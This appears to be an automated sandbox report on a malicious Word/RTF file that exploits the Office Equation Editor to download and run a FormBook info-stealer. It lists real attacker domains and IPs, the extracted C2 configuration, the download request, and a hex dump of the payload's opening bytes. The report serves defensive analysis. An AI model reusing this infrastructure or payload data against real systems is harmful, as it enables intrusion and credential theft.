Windows Analysis Report PO4018308875.doc

ID:	452509
Product:	CloudBasic
Start time:	14:13:52
Start date:	22.07.2021
Sample:	PO4018308875.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	1e7bc879d7960afaa08148c635ae534f
SHA1:	e1a0db056bdc1cba07ef43c27a80e5bfd79b4eac
SHA256:	8c4b07ce49252a4ed12ad611a9f8fde65a63fc12368c6726776e86e140d3872e
Filetype:	Rich Text Format (5005/1) 55.56%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	0E715DB2198FF670F4BF0E88E0E9B547	2DE5030A9261655E5879E4FABA7B5E79D1DD483E	4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B09F78D-537D-406E-B057-1B1541B1D39D}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C67C7B4A-7023-4170-93C2-146687425423}.tmp	data	2DB4DE4C5E457296FF44D1728A100C76	2AB1FB75384D496227A18FC5F53F2AAC1DE4851E	E9B6823D049FAA04166EE7C5333D356B417E1C4F8BCCF2C416ACB954F3896B85
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F7C72BCE-A594-453E-9048-97C10E531855}.tmp	data	9BDF023D1B68473A259350323CCCE99B	B56CDFA0AFE1A41A14D0338577B154664D30A1C8	1E0CB911731852A3D7848B5059595B5598052192AC76D95212FB3661B337C043
C:\Users\user\AppData\Local\Temp\princedan859323.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	0E715DB2198FF670F4BF0E88E0E9B547	2DE5030A9261655E5879E4FABA7B5E79D1DD483E	4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO4018308875.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jul 22 20:14:33 2021, length=50939, window=hide	229CF85BF54BC33AB9218FEB0D78C9D2	B360F768D9A7289E543DBC46A3BBA17AA14C3201	25DCC5819EEFE9F405B0C6797B09E7E614C6CC3A058CACC465652FBA2A50B5FF
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	839E988B45AF03E03223EAFB330777D7	0125F60C82CE60C0A57E62FB19BB9EC4EB122ADE	65A555177CBA318C35718AC9B0938024CC9B315DDC93B0FEC888A1E1ACCFB555
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	390880DCFAA790037FA37F50A7080387	760940B899B1DC961633242DB5FF170A0522B0A5	BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
C:\Users\user\AppData\Roaming\princedan859323.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	0E715DB2198FF670F4BF0E88E0E9B547	2DE5030A9261655E5879E4FABA7B5E79D1DD483E	4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
C:\Users\user\Desktop\~$4018308875.doc	data	390880DCFAA790037FA37F50A7080387	760940B899B1DC961633242DB5FF170A0522B0A5	BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391

AV Detection:

Antivirus detection for URL or domain

Source: http://topv.xyz/princedanx.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\princedan859323.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Source: PO4018308875.doc

ReversingLabs: Detection: 41%

Yara detected FormBook

Source: Yara match	File source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\princedan859323.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\princedan859323.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: topv.xyz

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.containerflippers.com/np0c/

Performs DNS queries to domains with low reputation

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	DNS query: topv.xyz
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	DNS query: topv.xyz

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 12:14:41 GMTContent-Type: application/x-msdownloadContent-Length: 648912Last-Modified: Wed, 21 Jul 2021 23:31:35 GMTConnection: keep-aliveETag: "60f8ae57-9e6d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0f 9e f8 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 08 00 00 2c 01 00 00 00 00 00 96 bb 08 00 00 20 00 00 00 c0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c bb 08 00 57 00 00 00 00 c0 08 00 18 28 01 00 00 00 00 00 00 00 00 00 00 ca 09 00 d0 1c 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 9b 08 00 00 20 00 00 00 9c 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 28 01 00 00 c0 08 00 00 2a 01 00 00 9e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 bb 08 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 9f 08 00 a0 1b 00 00 03 00 00 00 20 00 00 06 98 31 00 00 04 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 18 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1a 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 25 00 00 00 00 00 00 00 02 28 15 00 00 0a 02 03 16 2c 0b 26 26 02 04 15 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b f0 7d 03 00 00 04 2b 00 2a 00 00 00 03 30 04 00 5c 00 00 00 00 00 00 00 02 28 15 00 00 0a 20 f0 55 00 00 1c 2d 1b 26 02 73 16 00 00 0a 1d 2d 18 26 26 28 17 00 00 0a 7e 06 00 00 04 25 2d 2f 2b 0e 28 18 00 00 0a 2b df 7d 04 00 00 04 2b e3 26 7e 05 00 00 04 fe 06 0d 00 00 06 73 19 00 00 0a 25 1c 2d 03 26 2b 07 80 06 00 00 04 2b 00 6f 1a 00 00 0a 2a 13 30 03 00 29 00 00 00 01 00 00 11 03 04 73 04 00 00 06 16 2c 0c 26 02 03 28 0a 00 00 06 2d 13 2b 03 0a 2b f2 02 7b 04 00 00 04 06 6f 1b 00 00 0a 17 2a 16 2a 00 00 00 13 30 03 00 24 00 00 00 01 00 00 11 02 03 28 0a 00 00 06 17 2d 06 26 06 2c 14

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.239.243.112 185.239.243.112

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /princedanx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: topv.xyzConnection: Keep-Alive

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B09F78D-537D-406E-B057-1B1541B1D39D}.tmp

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /princedanx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: topv.xyzConnection: Keep-Alive

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: topv.xyz

URLs found in memory or binary data

Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp	String found in binary or memory: http://go.microso
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: http://www.opera.com0
Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr	String found in binary or memory: https://www.digicert.com/CPS0

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\princedan859323.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Code function: 4_2_002EA290		4_2_002EA290
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Code function: 4_2_002E1F28		4_2_002E1F28
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Code function: 4_2_002E1F18		4_2_002E1F18
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Code function: 4_2_006E06D5		4_2_006E06D5
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Code function: 4_2_007558C0		4_2_007558C0
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Code function: 4_2_0075845F		4_2_0075845F
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Code function: 4_2_0075852B		4_2_0075852B

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\princedan859323.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\princedan859323.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98

PE file contains strange resources

Source: princedanx[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedanx[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan859323.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan859323.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan859323.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan859323.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Yara signature match

Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: princedanx[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: princedan859323.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: princedan859323.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@24/10@2/1

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$4018308875.doc

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC12C.tmp

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: PO4018308875.doc

ReversingLabs: Detection: 41%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\princedan859323.exe C:\Users\user\AppData\Roaming\princedan859323.exe
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
